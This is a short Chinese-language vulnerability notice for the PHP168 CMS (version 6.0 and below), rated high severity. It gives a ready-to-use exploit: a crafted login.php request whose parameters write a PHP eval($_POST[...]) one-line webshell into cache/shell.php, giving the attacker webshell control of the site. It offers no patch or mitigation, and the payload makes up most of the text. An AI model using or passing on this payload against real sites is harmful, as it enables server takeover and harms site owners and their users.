PHP168 6.0及以下版本漏洞

危险等级：高
影响版本：PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句： ?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);? -------------------------- login.php login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=
写到：cache/shell.php